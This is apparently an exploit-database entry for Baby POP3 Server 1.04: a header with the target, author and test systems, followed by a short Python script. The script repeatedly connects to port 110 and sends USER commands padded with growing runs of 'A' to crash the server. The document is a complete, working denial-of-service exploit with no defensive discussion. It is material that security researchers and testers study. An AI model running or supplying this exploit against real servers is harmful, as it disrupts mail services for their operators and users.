# Exploit Title: DOS Baby POP3 Server 1.04 # Date: 12/08/2025 # Exploit Author: Érick Sousa (https://www.linkedin.com/in/erickssa) # Vendor Homepage: https://www.pablosoftwaresolutions.com # Software Link: https://www.pablosoftwaresolutions.com/html/baby_pop3_server.html # Version: Baby POP3 Server Version 1.04 # Tested on: Windows XP e Windows 7 # Python 3.13.5 ;) import socket jkcode = b"A" counter = 0 while counter < 10000: counter += 10 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.18.240", 110)) s.send(b"USER " + jkcode * counter + b"\r\n") s.close()